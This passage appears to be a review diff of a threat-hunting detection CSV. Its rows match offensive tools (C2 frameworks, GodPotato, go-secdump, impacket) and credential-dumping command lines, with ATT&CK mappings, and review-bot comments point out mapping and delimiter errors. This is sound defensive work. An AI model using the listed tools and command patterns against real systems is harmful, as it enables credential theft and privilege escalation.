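Review bot: The catch-all `*gobuster*` row carries a different mapping from the other gobuster rows in this hunk: `T1110 - T1114 - T1115 - T1107` with `TA0001 - TA0007`, where the rest use `T1595 - T1133 - T1110 - T1027 - T1132 - T1048`. T1114 and T1115 are email and clipboard collection, which does not fit a directory/DNS brute-forcer, and T1107 is deprecated in ATT&CK (file deletion is now T1070.004). I would align this row's technique and tactic fields with the sibling rows so that enrichment does not depend on which pattern matched. Because `*gobuster*` is a superset of every specific gobuster pattern here, each specific hit will presumably also raise the generic one; that depends on how the consumer deduplicates, so a note in `metadata_comment` would help rule authors.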
@@ -10966,27 +11117,27 @@ "*godoh-linux64*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*godoh-windows32.*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*godoh-windows64.*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" -"*go-donut/*.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*go-donut/*.go*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*GodPotato -*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotato.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*godpotato.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotato.git*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotatoContext.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. 
It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotato-master.zip*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotato-NET*.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotatoUnmarshalTrigger.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*go-donut/*.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*go-donut/*.go*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*GodPotato -*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*godpotato.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato.git*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotatoContext.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato-master.zip*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. 
It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato-NET*.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotatoUnmarshalTrigger.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" "*go-external-c2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*GoFetchAD/GoFetch*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*GoFetch-master*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*gohaleygoandhackawaythegibson*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*golang_c2-master*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*golden_ticket.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*golden_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*golden_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*GoldenGMSA.exe*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" "*GoldenGMSA-main*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" -"*goldenPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*goldenPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*goMatrixC2.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*goMatrixC2-main*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*GooDork*","offensive_tool_keyword","GooDork","GooDork is a simple python script designed to allow you to leverage the power of google 
dorking straight from the comfort of your command line. GooDork offers powerfull use of googles search directives. by analyzing results from searches using regular expressions that you supply","T1136 - T1560 - T1213","TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/k3170makan/GooDork","1","0","N/A","N/A","2","123","39","2013-06-08T23:13:12Z","2012-03-16T22:40:40Z" 
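Review bot: The re-emitted `*golden_ticket.rb*` row still carries `T1204 -T1210` in `metadata_tool_techniques`, without the space before the hyphen that every other entry uses as part of the ` - ` delimiter. A consumer that splits the column on ` - ` gets the single token `T1204 -T1210`, so neither technique resolves during alert enrichment. The two `go-donut` rows likewise keep a trailing space in `"TA0002 - TA0003 "`. Since these lines are rewritten for the counter refresh anyway, correct them to `T1204 - T1210` and `"TA0002 - TA0003"`. If the file is produced by a script (it looks like it, given the star and fork refresh), normalising the two ATT&CK columns there would keep this from recurring.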
@@ -11002,15 +11153,15 @@ "*google-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*goPassGen-master*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*gopherus --exploit mysql*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*gophish*phish.go*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" -"*gophish.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" -"*gophish/gophish*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. 
It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9757","1875","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish*phish.go*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*gophish/gophish*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. 
It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" "*gophish-send-mail.py*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" -"*GoRelayServer.dll*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*GoRelayServer.dll*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*gorsair -t *","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" -"*go-secdump -*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential 
Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" -"*go-secdump.exe*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" -"*go-secdump-main*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*go-secdump -*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*go-secdump.exe*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*go-secdump-main*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" "*gosecretsdump -ntds *-system *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - 
TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gosecure/pyrdp*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" "*go-shellcode.py*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 